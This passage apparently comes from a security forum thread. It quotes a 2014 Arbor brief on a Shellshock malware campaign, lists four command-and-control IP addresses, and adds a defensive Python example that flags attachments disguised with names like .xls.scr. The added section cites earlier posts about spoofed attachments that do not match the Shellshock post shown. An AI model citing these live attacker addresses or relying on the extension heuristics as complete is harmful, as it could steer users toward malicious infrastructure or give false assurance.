    The malware has been seen to be downloaded to a compromised machine by exploiting the Shellshock vulnerability and invoking commands such as "curl" or "wget," and then executing the malicious payload. To date, we have seen -4- variants of the Linux backdoor and several versions of the Perl-based IRC bot.
    Popularity Since Vulnerability Disclosure: The following domains and IPs have been found to be used as command & control (C&C) points for this campaign (amongst others):
    208.118.61.44: https://www.virustotal.com/en/ip-add...4/information/
    27.19.159.224: https://www.virustotal.com/en/ip-add...4/information/
    89.238.150.154: https://www.virustotal.com/en/ip-add...4/information/
    212.227.251.139: https://www.virustotal.com/en/ip-add...9/information/
    ... We have seen C&C traffic to these IPs in the last 2 -months- showing that they have been used for malicious and bot network campaigns -prior- to the Shellshock vulnerability disclosure. In fact, going back as far as 2012, we see that one such C&C was used in a Point-of-Sale malware campaign known as 'vSkimmer'. More recently, we have observed it serving up an IRC bot... Experience has taught us that as cyber-criminals zoom in on the vulnerable code branch, -additional- vulnerabilities are likely to surface..."

    - http://atlas.arbor.net/briefs/index#1914014714
    Extreme Severity
    3 Oct 2014

    Last edited by AplusWebMaster; 2014-10-04 at 19:05.

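Both posts above make the same point about the spoofed-icon attachments: with Windows hiding known extensions, a name such as Invoice_815992488951.xls.scr is shown as Invoice_815992488951.xls, and the document icon embedded in the .scr completes the disguise. The Python below is an added example, not code from the forum or the cited blogs; it classifies the attachment names quoted in the reports, shows what a user with hidden extensions would see, and reads a ZIP's member list without extracting anything, using a constructed in-memory ZIP as input. The verdict labels and the extension lists are my own assumptions, not from the reports.

```python
import io
import re
import zipfile

# Extensions Windows runs as programs: .scr (screensaver) and .pif (program
# information file) launch code just like .exe, which is why the reports treat them as droppers.
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "js", "wsf", "hta"}
# Document and image extensions the spam embeds in the name as a lure.
LURE_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}
# Registered types whose extension Explorer hides by default (assumed list).
HIDDEN_EXTS = EXECUTABLE_EXTS | LURE_EXTS | {"zip"}


def displayed_name(name):
    """Name as Explorer shows it with 'Hide extensions for known file types' on:
    the final registered extension is dropped, so 'Invoice.xls.scr' shows as 'Invoice.xls'."""
    base, dot, ext = name.rpartition(".")
    return base if dot and ext.lower() in HIDDEN_EXTS else name


def assess_name(name):
    """Classify an attachment name as a mail filter would; returns (verdict, shown_as)."""
    ext = name.rpartition(".")[2].lower() if "." in name else ""
    if ext in EXECUTABLE_EXTS:
        # A lure extension anywhere earlier in the name ("...xls.scr",
        # "PAYMENT DETAILS.PDF .scr_56453.exe") is a deliberate disguise.
        earlier = set(re.findall(r"[a-z0-9]+", name[: -len(ext) - 1].lower()))
        verdict = "disguised-executable" if earlier & LURE_EXTS else "executable"
    elif ext in LURE_EXTS:
        verdict = "document"
    else:
        verdict = "other"
    return verdict, displayed_name(name)


def triage_zip(zip_bytes):
    """List a ZIP attachment's members without extracting and assess each name."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [(member, assess_name(member)[0]) for member in zf.namelist()]


def build_sample_zip(member_names):
    """Constructed sample: an in-memory ZIP holding harmless placeholder bytes
    under the member names quoted in the reports (not the real payloads)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member in member_names:
            zf.writestr(member, b"placeholder")
    return buf.getvalue()
```

A gateway rule built on this would quarantine any ZIP whose member list contains an executable verdict, regardless of how the name is shown to the recipient.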